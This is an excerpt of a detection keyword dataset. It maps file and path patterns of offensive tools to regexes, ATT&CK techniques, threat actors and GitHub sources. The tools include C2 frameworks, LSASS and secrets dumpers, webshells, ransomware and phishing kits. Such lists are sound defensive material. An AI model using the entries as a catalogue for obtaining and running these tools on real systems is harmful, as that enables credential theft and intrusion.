- CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7527" "*/gmailC2.exe*",".{0,1000}\/gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","7528" "*/gmer.exe*",".{0,1000}\/gmer\.exe.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","7529" "*/gmer64.sys*",".{0,1000}\/gmer64\.sys.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","7530" 
"*/gMSA_dump_*.txt*",".{0,1000}\/gMSA_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","7531" "*/gMSADumper*",".{0,1000}\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","7532" "*/GMSAPasswordReader.*",".{0,1000}\/GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7533" "*/GMSAPasswordReader.*",".{0,1000}\/GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7534" "*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","7535" "*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7536" "*/GMSAPasswordReader.git*",".{0,1000}\/GMSAPasswordReader\.git.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","7537" "*/GoAWSConsoleSpray.git*",".{0,1000}\/GoAWSConsoleSpray\.git.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","7538" "*/gobuster.git*",".{0,1000}\/gobuster\.git.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7539" 
"*/gobuster/*",".{0,1000}\/gobuster\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7540" "*/gobusterdir/*",".{0,1000}\/gobusterdir\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7541" "*/gobusterdns/*",".{0,1000}\/gobusterdns\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7542" "*/gobustergcs/*",".{0,1000}\/gobustergcs\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7543" "*/gocrack.git*",".{0,1000}\/gocrack\.git.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7544" 
"*/gocrack/.hashcat*",".{0,1000}\/gocrack\/\.hashcat.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7545" "*/gocrack/server*",".{0,1000}\/gocrack\/server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7546" "*/gocrack_server*",".{0,1000}\/gocrack_server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7547" "*/gocrack_worker*",".{0,1000}\/gocrack_worker.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7548" "*/gocrack-1.0.zip*",".{0,1000}\/gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7549" "*/goDoH.git*",".{0,1000}\/goDoH\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept 
Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7550" "*/godoh.git*",".{0,1000}\/godoh\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7551" "*/godoh/*",".{0,1000}\/godoh\/.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7552" "*/goDoH/releases*",".{0,1000}\/goDoH\/releases.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7553" "*/godoh-master.zip*",".{0,1000}\/godoh\-master\.zip.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7554" "*/GodPotato.exe*",".{0,1000}\/GodPotato\.exe.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7555" "*/GodPotato.exe*",".{0,1000}\/GodPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7556" "*/GodPotato.git*",".{0,1000}\/GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","7557" "*/Godzilla.java*",".{0,1000}\/Godzilla\.java.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7558" "*/Godzilla-BypassOpenRasp.jar*",".{0,1000}\/Godzilla\-BypassOpenRasp\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7559" "*/GodzillaSource.git*",".{0,1000}\/GodzillaSource\.git.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - 
T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","7560" "*/gofetch.exe*",".{0,1000}\/gofetch\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","7561" "*/GoFetch.git*",".{0,1000}\/GoFetch\.git.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","7562" "*/golang_c2.git*",".{0,1000}\/golang_c2\.git.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","7566" "*/GoldenGMSA.git*",".{0,1000}\/GoldenGMSA\.git.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","7567" "*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - 
TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7568" "*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7569" "*/go-lsass.exe*",".{0,1000}\/go\-lsass\.exe.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7571" "*/go-lsass.git*",".{0,1000}\/go\-lsass\.git.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7572" 
"*/go-lsass/releases*",".{0,1000}\/go\-lsass\/releases.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7573" "*/go-lsass-master.zip*",".{0,1000}\/go\-lsass\-master\.zip.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7574" "*/goMatrixC2.git*",".{0,1000}\/goMatrixC2\.git.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","7575" "*/go-mimikatz*",".{0,1000}\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/vyrus001/go-mimikatz","1","1","N/A","N/A","10","7","619","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z","7576" "*/GONET-Scanner/*",".{0,1000}\/GONET\-Scanner\/.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","1","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","7577" "*/GonnaCry.git*",".{0,1000}\/GonnaCry\.git.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","1","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","7578" "*/google_drive_doubledrive.py*",".{0,1000}\/google_drive_doubledrive\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes 
OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","7580" "*/goPassGen.git*",".{0,1000}\/goPassGen\.git.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","7581" "*/Gopher.exe*",".{0,1000}\/Gopher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7582" "*/gopher-ls.nse*",".{0,1000}\/gopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7583" "*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7584" "*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","7585" "*/gophish/*",".{0,1000}\/gophish\/.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","7586" "*/gophish_admin.crt*",".{0,1000}\/gophish_admin\.crt.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7587" "*/gophish_admin.key*",".{0,1000}\/gophish_admin\.key.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx-Phishing-Infra-Setup","1","0","#linux","N/A","10","4","391","67","2024-12-12T04:13:02Z","2024-06-08T10:19:45Z","7588" "*/gorsair.go*",".{0,1000}\/gorsair\.go.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tool","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","N/A","9","851","70","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z","7589" "*/go-secdump.git*",".{0,1000}\/go\-secdump\.git.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","7590" "*/gosecretsdump*",".{0,1000}\/gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","7591" 